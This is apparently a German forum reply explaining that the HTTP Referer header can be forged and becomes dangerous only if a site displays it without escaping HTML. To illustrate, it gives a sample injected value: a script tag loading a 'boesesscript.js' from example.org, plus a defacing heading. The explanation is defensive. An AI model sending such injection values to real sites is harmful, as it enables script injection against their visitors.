Hallo Kodi,

Heißt das der Referrer ist nur manipulierbar aber kann
keine großen Schäden anrichten?

Der Referer ist beliebig manipulierbar aber an sich ungefährlich. Schaden anrichten kann er wenn dein Auswertungsscript anfällig z.B. gegen HTML-Injection ist.

Wenn du z.B. aus irendwelchen schwachsinnigen Gründen die 10 letzten Referer auf deine Seite schreibst und dabei keine HTML-Steuerzeichen escapest, kann ich dir einfach

<script src='http:example.org/boesesscript.js'></script>
oder auch
<h1 style="color:red">Diese Seite ist unsicher, Hahahaha</h1>

als Referer schicken und du baust das dann in deine Seite ein.

Oder sollte man von einem Referrer eher Abstand nehmen.

Wenn du meinst, ob du von der Verarbeitung des Referrern abstand nehmen solltest, das ist nicht zwingend notwendig. Nur solltest du halt bedenken, dass der beliebig manipulierbar ist.

Oder müssen die Referrer Infos validiert werden?

Wie willst du das denn machen?

Jonathan